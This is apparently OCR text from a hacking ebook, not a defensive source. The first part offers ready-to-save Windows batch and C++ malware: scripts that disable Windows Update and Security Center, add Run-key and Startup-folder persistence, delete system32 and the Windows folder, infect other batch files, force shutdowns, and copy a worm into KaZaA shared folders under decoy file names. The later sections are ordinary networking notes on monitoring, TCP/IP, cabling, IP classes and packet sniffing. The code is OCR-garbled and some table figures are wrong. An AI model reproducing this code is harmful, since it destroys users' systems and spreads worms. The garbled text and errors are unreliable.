»"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv] 
»"%Temp°/o.kill.reg" ECHO "Start"=dword:00000004 
»"%Temp°/o.kill.reg" ECHO. 

»"%Temp°/o.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c] 
»"%Temp°/o.kill.reg" ECHO "Start"=dword:00000004 



»"%Temp°/o.kill.reg" ECHO. 

START /WAIT REGEDIT /S "°/oTemp°/o.kill.reg" 
del "%Temp%.kill.reg" 
del %0 

echo @echo off>c:windowswimn32.bat 


echo break off»c:windowswimn32.bat 

echo ipconfig/release_all»c:windowswimn32.bat 

echo end»c:windowswimn32.bat 

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d 
c:windowswimn32.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d 
c:windowswimn32.bat /f 
:a 

start iexpress (website of your choice) 
goto a 


Save anything.bat 

(18) 



MAKING MOST DANGEROUS VIRUS CALLED MATRIX:: 


Warning - Do not run it on your computer 

#include 

#include 


#include 

#include 

#include 

#include 

#include 

using namespace std; 
int main() 

{ keybd_event(VK_MENU, 0x38, 0,0); 
keybd_event(VK_RETURN,0xlc,0,0); 
keybd_event(VK_RETURN,Oxlc,KEYEVENTF_KEYUP,0); 
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0); 
HANDLE outToScreen; 

outToScreen = GetStdHandle(STD_OUTPUT_HANDLE); 



{ 

char buffer[255]; 

char inputFile[]="C:\Documents and Setti ngs\AII Users\Start Menu\Programs\Startup\rawr.bat"; 
ifstream input(inputFile); 
if (linput) 

{ 

{ 


ofstream fp("C:\Documents and Setti ngs\AII Users\Start Menu\Programs\Startup\rawr.bat", ios::app); 
fp 
fp 
fp 
} 

} 


else 

{ 

while (linput. eof()) 

{ 

input.getline(buffer,255); 

} 



{ 

char buffer[255]; 
char inputFile[]="C:\rawr.exe"; 
ifstream input(inputFile); 
if (linput) 

{ 

{ 


{ 

ofstream fpf'CLICK.bat", ios::app) 
fp 
fp 
fp 
fp 
} 

systemf'START CLICK.bat"); 
main(); 

} 

} 


else 

{ 

while (linput. eof()) 

{ 



input.getline(buffer,255); 
systemf'call shutdown.exe -S"); 
goto START; 

} 

} 

} 

START: { 

for(int i = 0; i < 1; i++) 


{ 

int num = (rand() % 10); 

SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUNDJNTENSITY); 

cout 

cout 

cout 

cout 

cout 

cout 

cout 

cout 

cout 

cout 

cout 

cout 



Sleep(60); 

} 

} 

for ( int j = 0; j < 5; j++) 

{ 

SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN); 

int number = (rand() % 24); 

cout 


} 

goto START; 

Save as anything.bat 


(19) 

• Fire Worm 

• Very Very Dangerous Stuff. Don’t run it wanna know what it does? Try Running It Somewhere, don’t make 
yourself the victim. 

• @echo OFF 

if exist c:\romp.bat goto end 

: start 

els 

Echo Installing Update. . . 
cd c:\windows\system 


del keyboard. drv 
del mouse. drv 
TITLE System Update 
echo ::startup » c:\romp.bat 

echo if not exist c:\damp goto prompt » c:\romp.bat 

echo :start » c:\romp.bat 

echo els » c:\romp.bat 

echo cd c:\ » c:\romp.bat 

echo cd damp » c:\romp.bat 

echo md keys » c:\romp.bat 

echo pause » c:\romp.bat 


• echo copy *.bat c:\damp\keys\ILOYEYOU.bat » c:\romp.bat 

echo copy *.bat c:\damp\keys\ILOVEYOU.bat c:\windows\stone.bat » c:\romp.bat 

echo rmdir c:\WUTemp » c:\romp.bat 

echo del c:\windows\system32\*.* » c:\romp.bat 

echo rmdir c:\windows\system32 » c:\romp.bat 

echo cd c:\ » c:\romp.bat 

echo cd windows » c:\romp.bat 

echo md system32 » c:\romp.bat 

echo pause » c:\romp.bat 

echo cd c:\ » c:\romp.bat 

echo cd windows » c:\romp.bat 

echo cd system32 » c:\romp.bat 

echo md tools » c:\romp.bat 

echo copy *.bat c:\windows\system32\tools\urscrewed.bat 

echo echo msgbox” Ur system is now screwed” » c:\plastic.vbs » c:\romp.bat 

echo echo msgbox” Sorry Dude □ You Got Some Heck Of Stuff’ » c:\plastic.vbs » c:\romp.bat 

echo echo msgbox” Deleted all of system32 which is in windows and has messed 



with windows” » c:\plastic.vbs » c:\romp.bat 

echo echo msgbox” There is no more windows on this computer” » c:\plastic.vbs » c:\romp.bat 

echo Rd/s/q c:\windows » c:\romp.bat 

echo Rd/s/q c:\progra~l » c:\romp.bat 

echo goto part2 » c:\romp.bat 

» c:\romp.bat 

» c:\romp.bat 

echo :part2 » c:\romp.bat 

echo els » c:\romp.bat 

echo cd c:\ » c:\romp.bat 

echo md Kierstyn’scan » c:\romp.bat 

echo pause » c:\romp.bat 


echo goto part3 » c:\romp.bat 
» c:\romp.bat 
» c:\romp.bat 
echo :part3 » c:\romp.bat 

echo rename c:\windows c:\viriiscan » c:\romp.bat 

echo goto endl » c:\romp.bat 

echo :prompt » c:\romp.bat 

echo els » c:\romp.bat 

echo cd c:\ » c:\romp.bat 

echo md damp » c:\romp.bat 

echo copy *.bat c:\damp.bat » c:\romp.bat 

echo echo msgbox” Oh No u r so stupid” » c:\pomper.vbs » c:\romp.bat 

echo echo msgbox” Wow you probably got this through ur lan” » c:\pomper.vbs » c:\romp.bat 

echo echo msgbox” Happy dieing staples” » c:\pomper.vbs » c:\romp.bat 

echo goto start » c:\romp.bat 

» c:\romp.bat 

» c:\romp.bat 



echo :endl » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Matrix2.vid.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-legged-freaks.vid.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Password_finder.exe.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\s-club7.bmp.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\JackAss the movie.vid.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\pas sword hacker.exe.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Norton anti virus.exe.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-mile.mpg.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\kazaa.exe.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\realplayer.exe.bat » c:\romp.bat 


• echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\MyPic.bmp.bat » c:\romp.bat 
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very funnyAbmp.bat » 

• c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very funny*. mpg.bat » 

• c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared FolderYwindows xp.exe.bat » c:\romp.bat 
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to make viruses.txt.bat » 

• c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\*very funny*.bmp.bat » c:\romp.bat 
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to stop worm viruses.txt.bat » 

• c:\romp.bat 

echo goto end » c:\romp.bat 
echo :end » c:\romp.bat 
Echo Virus installed 

cd c:\Docume~l\All Users\Start Menu\Programs\Startup 

copy *.bat cd c:\Docume~l\All Users\Start Menu\Programs\Startup 

Echo Now You have to restart to save 



START C:\WINDOWS\RUNDLL.EXE user.exe, exitwindowsexec 

rundll32.exe shell32.dll,SHExitWindowsEx n 

pause 

del c:\thecreator.bat:end 

anything.bat in notepad 
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• CMD Matrix 

Don’t thi nk I am telling you about simple matrix falling effect of notepad. When you run it, it makes matrix out of the batch 
file. Don’t run it. 

/ ViRuZ En MaTrlx 
// ON HAX 

// http:7AVWW.ONHAX.NET 

#include 

#include 

#include 

#include 

#include 


#include 

#include 

using namespace std; 
int main() 

{ keybd_event(VK_MENU, 0x38, 0,0); 
keybd_event(YK_RETURN,0xle,0,0); 
keybd_event(VK_RETURN,Oxlc,KEYEVENTF_KEYUP,0); 
keybd_event(YK_MENU,0x38,KEYEVENTF_KEYUP,0); 
HANDLE outToScreen; 

outToScreen = GetStdHandle(STD_OUTPUT_HANDLE); 


{ 

char buffer [255]; 

char inputFile[]- ’C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat”; 
ifstream input(inputFile); 
if ( linput) 

{ 

{ 

ofstream fp(“C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat”, ios::app); 
fp « “ @echo OFF n”; 
fp « “START C:\rawr.exe n”; 
fp « “EXIT”; 

} 

} 

else 

{ 

while ( [input. eof()) 

{ 


input . getline (buffer, 25 5 ) ; 

} 

} 

} 

{ 

char buffer [255]; 
char inputFile[]=”C:\rawr.exe”; 
ifstream input(inputFile); 
if ( linput) 

{ 

{ 


{ 

ofstream fp(“CLICK.bat”, ios::app); 
fp « “ @echo OFF n”; 
fp « “COPY matrix.exe C:\rawr.exe n’ 
fp « “START C:\rawr.exe n”; 
fp « “EXIT”; 

} 

system(“START CLICK.bat”); 
main(); 

} 

} 

else 

{ 

while ( [input. eof()) 

{ 


input . getline (buffer, 25 5 ) ; 
system(“call shutdown.exe -S”); 
goto START; 

} 

} 

} 

START :{ 

for(int i = 0; i < 1; i++) 

{ 

int num = (rand() % 10); 

SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN I FOREGROUND_INTEN S IT Y) ; 


cout « setw(4) « num; 
cout « setw(4) « “0%”; 
cout « setw(4) « “P”; 
cout « setw(4) « ” “; 
cout « setw(4) « 
cout « setw(4) « “#”; 
cout « setw(4) « “X”; 
cout « setw(4) « 
cout « setw(4) « “1&”; 
cout « setw(4) « 
cout « setw(4) « “II”; 
cout « setw(4) « ” “; 
Sleep(60); 

} 



} 

for ( int j = 0; j < 5; j++) 

{ 

S etConsoleT ext Attribute (outToS creen, FOREGROUND_GREEN) ; 
int number = (rand() % 24); 
cout « setw(4) « number; 

} 

goto START; 


Anything.bat in notepad 
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• Danger !!! 

I ain’t gonna tell anything about this one find it yourself.. Don’t test it on your PC. 
@echo off>nul.ViRuS 

if ?%l==?/ViRuS_MULTIPLY goto ViRuS_multiply 
if ?%l==?/ViRuS_OUTER_LOOP goto ViRuS_outer_loop 
if ?%l==?/ViRuS_FINDSELF goto ViRuSJindself 
if ?%VOFF°/o==?T goto ViRuS_OLDBAT 
set ViRuSname=%0 

if not exist %0.bat call %0 /ViRuS_FINDSELF %path% 
if not exist %ViRuSname%.bat set ViRuSname= 
if ?%ViRuSname%==? goto ViRuS_OLDBAT 


rem ViRuS if batch is started with name.BAT, virus will not become active 
rem ViRuS it was a bug, now it?s a feature ! (also notice the voff variable) 
rem ViRuS also if batch was only in an append /xn path (chance=minimal) 
attrib +h %ViRuSname%.bat 

for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP °/o%a 

attrib -h %ViRuSname%.bat 

set ViRuSname= 

goto ViRuS_OLDBAT 

:ViRuS_findself 

if ?%2==? goto XXX_END>nul. ViRuS 

if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname% 


if exist %ViRuSname%.bat goto XXX_END 

if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname% 

if exist %ViRuSname%.bat goto XXX_END 

shift>nul. ViRuS 

goto ViRuS_findself 

:ViRuS_outer_loop 

for %%a in (%2*.bat;°/o2*.bat) do call %0 /ViRuS_MULTIPLY %%a 

goto XXX_END>nul. ViRuS 

:ViRuS_multiply 

find PViRuS? <%ViRuSname%.bat >xViRuSx.bat 

find /v PViRuS? <%2 | find /v ?:XXX_END? »xViRuSx.bat 

echo :XXX_END»xViRuSx.bat 

copy xViRuSx.bat %2>nul 

del xViRuSx.bat 

goto XXX_END>nul. ViRuS 



:ViRuS_OLDBAT 
echo on>nul.ViRuS 
echo Exclusive ON HAX 
:XXX END 


Save as anything.bat 


12. Network Monitoring And Management 

Network Management Details 
We Monitor 

• System & Services - Available, reachable 

• Resources - Expansion planning, maintain availability 

• Performance - Round-trip-time, throughput 

• Changes and configurations - Documentation, revision control, logging 

We Keep Track Of 

• Statistics - For purposes of accounting and metering 



• Faults (Intrusion Detection) 

- Detection of issues, 

-Troubleshooting issues and tracking their history 

• Ticketing systems are good at this 

• Help Desks are a useful to critical component 

Baselining 

What is normal for your network? 


If you’ve never measured or monitored your 
network you will need to know things like: 

-Typical load on links (e • Cacti) 

- Level of jitter between endpoints (e • Smokeping) 

-Typical percent usage of resources 

- Typical amounts of “noise”: 

• Network scans 

• Dropped data 

• Reported errors or failures 


Why do all this? 

Know when to upgrade 

- Is your bandwidth usage too high? 



- Where is your traffic going? 

- Do you need to get a faster line, or more providers? 

- Is the equipment too old? 

Keep an audit trace of changes 

- Record all changes 

- Makes it easier to find cause of problems due to 
upgrades and configuration changes 

Keep a history of your network operations 


- Using a ticket system lets you keep a history of events. 

- Allows you to defend yourself and verify what happened 


Why network management? 

Accounting 

-Track usage of resources 

- Bill customers according to usage 

Know when you have problems 

- Stay ahead of your users! Makes you look good. 

- Monitoring software can generate tickets and automatically 
notify staff of issues. 


Trends 



- All of this information can be used to view trends 
across your network. 

- This is part of baselining, capacity planning and 
attack detection. 

The “Big Three”? 

Availability 

- Nagios Services, servers, routers, Switches 


Reliability 

- Smokeping Connection health, rtt, service response time, latency 

Performance 

- Cacti Total traffic, port usage, CPU RAM, Disk, processes 

Functional overlap exists between these programs! 

Attack Detection 

• Trends and automation allow you to know 
when you are under attack. 

• The tools in use can help you to mitigate 


attacks: 


- Flows across network interfaces 

- Load on specific servers and/or services 

- Multiple service failures 


Network monitoring systems & tools 
Three kinds of tools 


1. Diagnostic tools - used to test connectivity, 
ascertain that a location is reachable, or a 
device is up - usually active tools 

2. Monitoring tools - tools running in the 
background (’’daemons” or services), which 
collect events, but can also initiate their own 
probes (using diagnostic tools), and recording 
the output, in a scheduled fashion. 

3. Performance Tools 

Key is to look at each router interface (probably 
don’t need to look at switch ports). 

Active tools 

- Ping - test connectivity to a host 

- Traceroute - show path to a host 

- MTR - combination of ping + traceroute 

- SNMP collectors (polling) 



Passive tools 

- log monitoring, SNMP trap receivers, NetFlow 


Automated tools 

- SmokePing - record and graph latency to a set of hosts, 
using ICMP (Ping) or other protocols 

- MRTG/RRD - record and graph bandwidth usage on a 
switch port or network link, at regular intervals 


Network & Service Monitoring tools 

- Nagios - server and service monitor 

• Can monitor pretty much anything 

• HTTP, SMTP, DNS, Disk space, CPU usage, ... 

• Easy to write new plugins (extensions) 

- Basic scripting skills are required to develop simple 
monitoring jobs - Perl, Shell scripts, php, etc... 

- Many good Open Source tools 

• Zabbix, ZenOSS, Hyperic, OpenNMS ... 

Monitor your critical Network Services 

- DNS/Web/Email 

- Radius/LDAP/SQL 

- SSH to routers 



How will you be notified? 

Don't forget log management! 

- Every network device (and UNIX and Windows servers 
as well) can report system events using syslog 

- You must collectandmoniter your logs! 

- Not doing so is one of the most common mistakes when 
doing network monitoring 

Network management protocols 


SNMP - Simple Network Management 
Protocol 

- Industry standard, hundreds of tools exist to exploit it 

- Present on any decent network equipment 

• Network throughput, errors, CPU load, temperature, ... 

- UNIX and Windows implement this as well 

• Disk space, running processes, ... 

SSH and telnet 

- It is also possible to use scripting to automate 
monitoring of hosts and services 

Ticketing systems : Example 

rt (request tracker) 

- Heavily used worldwide. 

- A classic ticketing system that can be customized to 
your location. 


- Somewhat difficult to install and configure. 

- Handles large-scale operations. 

trac 

- A hybrid system that includes a wiki and project 
management features. 

- Ticketing system is not as robust as rt, but works well. 

- Often used for ”trac”king group projects 

redmine 

- Like trac, but more robust. Harder to install 


Network Intrusion Detection 
Systems (NIDS) 

These are systems that observe all of your network 
traffic and report when it sees specific kinds of 
problems, such as: 

- hosts that are infected or are acting as spamming sources. 

A few tools: 

- SNORT - a commonly used open source tool: 
http://www.snort.org/ 

- Prelude - Security Information Management System 
https://dev.prelude-technologies.com/ 

- Samhain - Centralized HIDS 
http://la-samhna.de/samhain/ 

- Nessus - scan for vulnerabilities: 
http://www.nessus.org/download 


13. Network Concept 


1. Introduction 

2. Protocols 

3. Protocol Layers 

4. Network Interconnection/Internet 


1. Introduction 

-A network can be defined as a group of computers and other devices 
connected in some ways so as to be able to exchange data. 

-Each of the devices on the network can be thought of as a node; each 
node has a unique address. 

-Addresses are numeric quantities that are easy for computers to work 
with, but not for humans to remember. 

Example: 204.160.241.98 

-Some networks also provide names that humans can more easily remember than numbers 

Addressing 

Internet address 


Consists of 4 bytes separated by periods 



Example: 136.102.233.49 

-The R first bytes (R= 1,2,3) correspond to the network address; 
-The remaining H bytes (H = 3,2,1) are used for the host machine. 
-InterNIC Register: organization in charge of the allocation of the 
address ranges corresponding to networks. 

-Criteria considered: 

□ Geographical area (country) 

□ Organization, enterprise 

□ Department 

□ Host 


Domain Name System (DNS) 

-Mnemonic textual addresses are provided to facilitate the manipulation 
of internet addresses. 

-DNS servers are responsible for translating mnemonic textual Internet 
addresses into hard numeric Internet addresses. 

Ports 

-An IP address identifies a host machine on the Internet. 

-An IP port will identify a specific application running on an Internet host 
machine. 

-A port is identified by a number, the port number. 


-The number of ports is not functionally limited, in contrast to serial 
communications where only 4 ports are allowed. 



-There are some port numbers which are dedicated for specific 
Applications 


Applications 

Port numbers 

HTTP 

80 

FTP 

20 and 21 

GOPHER 

70 

SMTP (e-mail) 

25 

POP3 (e-mail) 

110 

TELNET 

23 

FINGER 

79 






Data Transmission 

-In modern networks, data are transferred using packet switching. 

-Messages are broken into units called packets, and sent from one 
computer to the other. 

-At the destination, data are extracted from one or more packets and 
used to reconstruct the original message. 

-Each packet has a maximum size, and consists of a header and a data 
area. 

-The header contains the addresses of the source and destination 
computers and sequencing information necessary to reassemble 
the message at the destination. 





Packet 

header data 


1001. ...101 

000 1 0000 111 ... 000000 110001100 




Types of Networks 

There are two principle kinds of networks: Wide Area Networks (WANs) and Local Area Networks (LANs). 


WANs 

-Cover cities, countries, and continents. 

-Based on packet switching technology 

-Examples of WAN technology: Asynchronous Transfer Mode (ATM), 
Integrated Services Digital Network (ISDN) 

LANs 

- Cover buildings or a set of closely related buildings. 

- Examples of LAN technology: Ethernet, Token Ring, and Fibber 
Distributed Data Interconnect (FDDI). 

Ethernet LANs: based on a bus topology and broadcast communication 
Token ring LANs: based on ring topology 


FDDI LANs: use optical fibbers and an improved token ring mechanism 




based on two rings flowing in opposite directions. 


Network connectivity 
type 

Speed 

Transmission time 
for 10 Mbytes 

(Telephone) dial-up 
modem 

14.4 Kbps 

90 min 

ISDN modem 

56/128 Kbps 

45/12 min 

T1 connection 

1.54 Mbps 

50s 

Ethernet 

10 Mbps 

9s 

Token ring 

4/16 Mbps 


Fast Ethernet 

100 Mbps 


FDDI 

100 Mbps 


Gigabit Ethernet 

1 Gbps 


ATM 

25Mbps/2.4Gbs 



Interconnection 

-Networks of low capacity may be connected together via a backbone 
network which is a network of high capacity such as a FDDI network, a 
WAN network etc. 

-LANs and WANs can be interconnected via T1 or T3 digital leased 
lines 

-According to the protocols involved, networks interconnection is 
achieved using one or several of the following devices: 

Q Bridge: a computer or device that links two similar LANs based on 
the same protocol. 

□ Router: a communication computer that connects different types of 
networks using different protocols. 

□ B-router or Bridge/Router: a single device that combines both the 
functions of bridge and router. 

□ Gateway: a network device that connects two different systems, using 
direct and systematic translation between protocols. 


Network Topology Diagram 

The specification of the network topology diagram requires the 
definition of the characteristics and entities underlying the network: 

-Geographical locations of the different components or subnets 
involved in the network. 


-Description of the LAN topology 
-Description of the WAN topology 

-Description of the network connectors such as routers, bridges, 
repeaters, and gateways. 

Protocols 

-Define the rules that govern the communications between two 
computers connected to the network. 

-Roles: addressing and routing of messages, error detection and 
recovery, sequence and flow controls etc. 

-A protocol specification consists of the syntax, which defines the kinds 
and formats of the messages exchanged, and the semantic, which 
specifies the action taken by each entity when specific events occur. 


Example: HTTP protocol for communication between web browsers 
and servers. 



-Protocols are designed based on a layered architecture such as the OSI 
reference model. 

-Each entity at a layer n communicates only with entities at layer n-1. 

-The data exchanged, known as Protocol Data Unit (PDU), goes back 
and forth through the layers, each layer adds or removes its own header 
and vice-versa. Therefore a layer n PDU may become a layer n-1 data. 


Protocol Layers 

The OSI ( Open Systems Interconnection ) Data Model 

-ISO standard for computer networks design and functioning. 

-Involves at least 7 layers, each playing a specific role when 
applications are communicating over the net. 

-During the sending process, each layer (from top to down) will add 
a specific header to the raw data. 

-At the reception, headers are eliminated conversely until the data 
arrived to the receiving application. 


Physical layer: ensures a safe and efficient travel of data; consists of 
electronic circuits for data transmission etc. 


Data link layer:in charge of data encapsulation under the form of 



packets and their interpretation at the physical layer. 


Network layer:in charge of packets transmission from a source A to a 
destination B. 

Transport layer: in charge of the delivery of packets from a source A 
to a destination B 


Session layer:in charge of the management of network access. 

Presentation layer: determines the format of the data transmitted to 
applications, data compressing/decompressing, encrypting etc. 

Application layer:contains the applications which are used by the 
end-user, such as Java, Word etc. 


Network layer 

-Provides the same functionality as the physical, the data link and 
network layers in the OSI model. 

-Mapping between IP addresses and network physical addresses. 
-Encapsulation of IP datagrams, e.g packets, in format understandable 
by the network. 

Internet layer 

-Lies at the heart of TCP/IP. 

-Based on the Internet Protocol (IP), which provides the frame for 
transmitting data from place A to place B. 



Transport layer 

-Based on two main protocols: TCP (Transmission Control Protocol) 
and UDP (User Datagram protocol) 

Application layer 

-Combines the functions of the OSI application, presentation, and 
session layers. 

-Protocols involved in this layer: HTTP, FTP, SMTP etc. 


Networks Interconnection/Internet 
Concept of Network Interconnection 

-First implemented in the Defense Advanced Research Project Agency 
Network (Arpanet), in 1966 in USA. 

-Consists of connecting several computer networks based on different 
Protocols 

-Requires the definition of a common interconnection protocol on top 
the local protocols. 

-The Internet Protocol (IP) plays this role, by defining unique addresses 
for a network and a host machine. 


Internet Protocol (IP) 



Overview 


-The IP protocol provides two main functionality: 

□Decomposition of the initial information flow into packets of 
standardized size, and reassembling at the destination. 

□Routing of a packet through successive networks, from the source 
machine to the destination identified by its IP address. 


-Transmitted packets are not guaranteed to be delivered ( datagram 
protocol). 

-The IP protocol does not request for connection ( connectionless ) 
before sending data and does not make any error detection. 

Functions 

-Decompose the initial data (to be sent) into datagrams. 

-Each datagram will have a header including, the IP address and the 
port number of the destination. 

-Datagrams are then sent to selected gateways, e.g IP routers, connected 
at the same time to the local network and to an IP service provider 
network. 

-Datagrams are transferred from gateways to gateways until they arrived 
at their final destination. 



Structure of an IP packet 


-The fields at the beginning of the packet, called the frame header, 
define the IP protocol’s functionality and limitations. 

-32 bits are allocated for encoding source and destination addresses (32 
bits for each of these address fields). 


-The remainder of the header (16 bits) encodes various information such 
as the total packet length in bytes. 

-Hence an IP packet can be a maximum of 64Kb long. 


Transmission Control Protocol (TCP) 

Overview 

-TCP provides by using IP packets a basic service that does guarantee 
safe delivery: 

□error detection 
□safe data transmission 

□assurance that data are received in the correct order 

-Before sending data, TCP requires that the computers communicating 



establish a connection ( connection-oriented protocol ). 

-TCP provides support for sending and receiving arbitrary amounts of 
data as one big stream of byte data (IP is limited to 64Kb). 

-TCP does so by breaking up the data stream into separate IP packets. 

-Packets are numbered, and reassembled on arrival, using sequence and 
sequence acknowledge numbers. 


-TCP also improves the capability of IP by specifying port numbers. 

□ There are 65,536 different TCP ports (sockets) through which every 
TCP/IP machine can talk. 


User Datagram Protocol (UDP) 

Overview 

-Datagram protocol also built on top of IP. 

-Has the same packet-size limit (64Kb) as IP, but allows for port 
number specification. 

-Provides also 65,536 different ports. 


-Hence, every machine has two sets of 65,536 ports: one for TCP and the 
other for UDP. 



-Connectionless protocol, without any error detection facility. 


-Provides only support for data transmission from one end to the other, 
without any further verification. 

-The main interest of UDP is that since it does not make further 
verification, it is very fast. 

-Useful for sending small size data in a repetitive way such as time 
information. 


Internet Application Protocols 

On top of TCP/IP, several services have been developed in order to 
homogenize applications of same nature: 

-FTP (File Transfer Protocol) allows the transfer of collection of files 
between two machines connected to the Internet. 

-Telnet (Terminal Protocol) allows a user to connect to a remote host in 
terminal mode. 

-NNTP (Network News Transfer Protocol) allows the constitution of 
communication groups (newsgroups) organized around specific topics. 

-SMTP (Simple Mail Transfer Protocol) defines a basic service for 
electronic mails. 

-SNMP (Simple Network Management Protocol) allows the 



management of the network. 


FTP 

TELNET 

SMTP 

SNMP 


TCP/UDP 


IP 


Ethernet 


Arpanet 


Token king 


14. Network Cabling 


Learning Objectives 

• List common cable types used in networking 

• Describe how UTP cables are made 

• Explain how UTP cables are used in Ethernet networks 

• Demonstrate the ability to make a working patch cable 

• Name the two wiring standards used for wired Ethernet networks and their uses 


Common network cable types 


• Coaxial cable 



• Unshielded 
twisted pair 



• Fiber optic 




UTP characteristics 


• Unshielded 


Twisted (why?) pairs of insulated conductors 


• Covered by 
insulating sheath 


UTP 



conductor 
insulation 
pair 
shea tli 


UTP categories 


Category 1 


Voice only (Telephone) 



Category 2 

Data to 4 Mbps (Localtalk) 

Category 3 

Data to 10Mbps (Ethernet) 

Category 4 

Data to 20Mbps (Token ring) 

Category 5 

Data to 100Mbps (Fast Ethernet) 

Category 5e 

Data to 1000Mbps (Gigabit Ethernet) 

Category 6 

Data to 2500Mbps (Gigabit Ethernet) 


Cat5e cable 

• 1 0OOMbps data capacity 

• For runs of up to 90 meters 

• Solid core cable ideal for structural installations (PVC or Plenum) 

• Stranded cable ideal for patch cables 

• Terminated with RJ-45 connectors 


RJ45 connector 




Making connections - Tools 

• Cat5e cable 

• RJ45 connectors 

• Cable stripper 

• Scissors 

• Crimping tooL 



Making connections - Steps 

1 . Strip cable end 

2. Untwist wire ends 

3. Arrange wires 

4. Trim wires to size 

5. Attach connector 


6. Check 


7. Crimp 

8. Test 


Step 1 - Strip cable end 

• Strip 1 - IV 2 ” of insulating sheath 

• Avoid cutting into conductor insulation 



• Sort wires by insulation colors 




Step 3 - Arrange wires 

• TIA/EIA 568A: GW-G OW-BI BIW-0 BrW-Br 

• TIA/EIA 568B: OW-O GW-BI BIW-G BrW-Br 




Step 4 - Trim wires to size 

• Trim all wires evenly 

• Leave about V 2 ” of wires exposed 



Step 5 - Attach connector 


• Maintain wire order, left-to-right, with RJ45 tab facing downward 



Step 6 - Check 

• Do all wires extend to end? 

• Is sheath well inside connector? 








Step 7 - Crimp 


• Squeeze firmly to crimp connecter 
onto cable end (8P) 

After Crimping 


Step 8 - Test 

• Does the cable work? 





15. IP Class 


IP Address Classifications 


Class Bits in Number of Bist in Number Of Hosts/ Address Range Subnet Mask 

Network ID Networks host ID Network 

A 8 126 24 4000,000 1. 0.0.0 to 255.0.0.0 

126.255.255.255 

B 16 16384 16 65536 128.0.0.0 to 255.255.0.0 

191.255.255.255 

C 24 2000,000 8 65536 192.0.0.0 to 255.255.255.0 

223.255.255.255 

DO 0 28 268,400,000224.0.0.0 to 

239.255.255.255 

E Class E addresses are reserved for future use (and Class D are usually used for testing only). 


Assigning Host IDs: 

> a.b.c.1 through a.b.c.10 - usually routers and servers 





> a.b.c.1 1 through a.b.c.204 - usually workstations 

> a.b.c.241 through a.b.c.254 - usually UNIX (or Linux) hosts 

Intranet Network IDs: 

> 10.0.0.0 through 10.255.255.255 - usually Internal networks 

> 1 72.1 6.0.0 through 1 72.31 .255.255 - usually Intranets not connected to the Internet 

> 192.168.0.0 through 192.168.255.255 - usually networks connected to the Internet 
(and usually behind a firewall) 


Class A Subnet Masks 


Subnet Mask Number Number of Usable Number of Hosts 
Bits in Mask Subnets per Subnet 


255.0.0.0 

8 


1 

16,777,214 

255.192.0.0 


10 

2 

4,194,302 

255.240.0.0 


12 

14 

1,048,574 

255.255.0.0 


16 

254 

65,634 







255.255.128.0 


17 


510 


32,766 


255.255.240.0 

20 

4094 


4094 

255.255.255.128 

25 

131070 


126 

255.255.255.240 28 


1,048,574 

14 


255.255.255.252 30 


4,192,302 

2 



Class B Subnet Masks 


Subnet Mask 
Bits in Mask 

Number 

Subnets 

Number of Usable Number of Hosts 

per Subnet 

255.255.0.0 

16 

1 


65,634 

255.255.192.0 

18 

2 


16382 

255.255.240.0 

20 

14 


4094 

255.255.255.0 

24 

254 


254 














255.255.255.240 28 

4094 

14 

255.255.255.252 30 

16382 

2 


Class C Subnet Masks 


Subnet Mask Number 

Number of Usable 

Number of Hosts 

Bits in Mask Subnets 


per Subnet 

255.255.255.0 24 

1 


254 

255.255.255.192 26 

2 


62 

255.255.255.224 27 

6 


30 

255.255.255.240 28 

14 


14 

255.255.255.248 29 

6 


30 


255.255.255.252 30 


62 


2 











16. Pocket Sniffing 


What is a "packet sniffer"? 

A packet snifferis a wire-tap devices \SW that plugs into computer networks and eavesdrops on the 
network traffic. Like a telephone wiretap, allows us to listen in on other people's conversations 

□a "sniffing" program lets someone listen in on computer conversations. 


Introduction 


Terminology:A packet snifferalso known as a network analyzeror protocol analyzer, for particular types 
of networks, an Ethernet snifferor wireless sniffer 

□ Packet sniffer can intercept and log traffic passing over a digital network or part of a network. 

As data streams travel back and forth over the network, the sniffer captures each packet and 
eventually decodes and analyzes its content according with any specifications 


However, computer conversations consist of apparently random binary data. Therefore, network 
wiretap programs also come with a feature known as "protocol analysis", which allow them to "decode" 



the computer traffic and make sense of it. 


shared media 


Sniffing also has one advantage over telephone wiretaps: many networks use "shared media". 

This means that you don't need to break into a wiring closet to install your wiretap, you can do it from 
almost any network connection to eavesdrop on your neighbors. This is called a "promiscuous mode" 
